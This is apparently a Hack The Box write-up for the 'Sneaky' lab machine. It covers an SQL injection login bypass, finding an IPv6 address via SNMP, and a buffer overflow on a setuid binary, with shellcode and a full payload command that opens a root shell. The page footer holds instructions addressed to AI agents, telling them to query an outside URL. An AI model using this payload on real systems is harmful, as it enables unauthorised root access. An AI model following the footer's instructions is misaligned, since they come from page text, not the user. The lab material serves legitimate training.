# Sneaky ## Sneaky - 10.10.10.20 ### Target Enumeration: IP: 10.10.10.20 User: 9fe14f76222db23a770f20136751bdab Root: See screenshot ### Ports / Services / Software Versions Running 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) ### Vulnerability Exploited: SQLi authentication bypass Users ssh key stored on webserver. ### Privilege Escalation: /usr/local/bin/chal is vulnerable to a buffer overflow ### Exploiting the host: Nmap ![](https://lh6.googleusercontent.com/i8qPkOI8tRyXiCH8SEBrcmGlEAm9jGchK1S8PKRKDkRaHBSyHkvhKcEyAz69C4odFsLY_VUb6v74j75t1KQ9aRlq4UhyTvlGvqNQmuC_VB2kdyibOL3kqAty9yGKocHnP9BXIvl1) Dirb:

/dev is a login page

Intercept login request and fuzz for sql with burp intruder: ![](https://lh3.googleusercontent.com/_sMikqLi8oCm7x1XRoTLFEFU52b0yHAA8mBUznRZ2YwNE6EE2h3UZAvtyDyzNQo_JwTPHGC7YdkNhDeKjrccKPaFnR_tqDU3_rpv0m1C1W5HngGJ9w3GS24haE28lYXtmvvinYor) You can bypass the login with an sqli payload

Request in browser and download the key

Key contents

There is no ssh port open so need to find the IPv6 address. Check our IPv6 address Snmpwalk pubic string gives lots of information: ![](https://lh4.googleusercontent.com/nCKdkk9-zNmw01y4dm-gAyQZhPn1O1phhpvTexZ4jpfDK7rrUTE-yCkgjsqAZ6p-wM-ReU3QdBbNfvnM6ZM6vBlj29ll8LlsH1gIDaDKjStdluqgdqr_nqPlqe8dhJDPp8wnz2Tn) Find the IPv6 info ![](https://lh4.googleusercontent.com/sXfNg4BeIxnm8soaP1z1MZg_pTmWwJBvTRQ6zyfYWAYYDKGUW9KEAa3MqPakRJdbOO4rLFzuifwJrQ5t9nvCkA6dNhbENPIXsNHzqBt8Eyd5FukG9ZQXF9yDmpqfR14BGYA8v8hB) Convert from decimal to hex iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248 254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248 Convert to hex with python:

Build the address based on the same format `Dead:beef::250:56ff:feb2:8ef8` Login with ssh -6 username and key ![](https://lh5.googleusercontent.com/V39NTS1tgMyOMiEYJhG3cma8lKBYoDGhIRYd-a0brXy36b2oZ3LN7hpUO7D1IgkgidFVN_Ax_KgKDnxGLznKNr83KzpB2IjyeAkBRTxgTUy9kpwFT6PLe13HqPOn_hg9QIWrzizl) Search for privesc ![](https://lh4.googleusercontent.com/CtzkIEBmtSiRxQV9lqHnSO0lsyrcIyh8wEuifE4DvIcG575rjof9wq8BRK-sbkWrfyjtswg4RDVPWsXLb4qLU5V7-E2ocaHDWnAxEh2nOP63xhEo9CQ18ilcatJJrwAmO1Ao_iMw) Running the file shows it could be vulnerable to a buffer overflow

Check you can overwrite: ![](https://lh4.googleusercontent.com/0aFs6eDsC4wKWxrzSA_ih6Oj9joM_zktkGO4sF12o9h0TwWX5pVLQTDR7pv_kkJ0Sm43SOfFvveKjBRRWTaKL_-3Vj-eYSYAIfXPSLa1pexZHMvpV8e8oAYgPstlQuOq7-B1c2iN) Generate a pattern to locate offset ![](https://lh3.googleusercontent.com/IR4QPZYwpLc_AyAqaGzDFb-0Kzj2kdHtPaS-iCPGw6Nni09zGBaAWHe0-R9h5RHgdb5-c1gciuIJRbsPTprCOgfO9Gn8aVinRJhsnRESON8ysdFb6CPEGmXbCJLjDzopEZ5KAg2x) Dump that into the program

Query the offset ![](https://lh3.googleusercontent.com/5jijNmo8LZ73XXhlMl7Nywf2-z-P1QcXHAEucQgfkJ77fPtsoIgL1FdC1bkYbIq6V1mpJEKSNc_Z1F8FzH8eOkCexBcyfXv7Q6Gn1xkmJfTqciLZF-D8dYWWnrQOIdVGMH_zfZCb) Found the offset ![](https://lh6.googleusercontent.com/7op9KCgUaXkjaORWM8pHpP3OPH508SUZyeC1B4tr_lxx7FG5Y9GOeBUNnEuklV1NLE4SDMHXKuafKmkb1vUTQG1I7b5vqpBB8jBiqfC0XkwQyqmVvwny3NJQjOeu5mEpOe45Oe2s) Build the overflow using /bin/sh as shellcode ``` "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ``` You will need to try various memory addresses to get this to exploit: Open gdb and find the memory addresses: (gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA ![](https://lh3.googleusercontent.com/Erz_6cbXeqbdU6VVKDaB8RzEm5tpVQ7dVI1h5RUxXGPnjvjtPY5tgt78IRRznvp0BR3JmBlgizkN2-kPUIOA_Egd1vjmv3r0pbDgJ2QphvpUvInEg7aeloxNbpSHAgTE3ukqKOsM) Convert address to little endian Build your payload as follows: ``` /usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"') ``` ![](https://lh4.googleusercontent.com/-f7K2wlXknEa5ePcu4milvEZ0-vFzNTsloWhNJInqJgcevTHIBw6D5E00WKv-oa2wT0JAaXqpSZP9DKipqOOLn0-P4tua4CyNWHNuNb9gDJMRgt0Yyrm8327AW7AApXddfq7lBSE) Now you have a root shell so collect the flags

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.jdksec.com/hack-the-box/sneaky.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.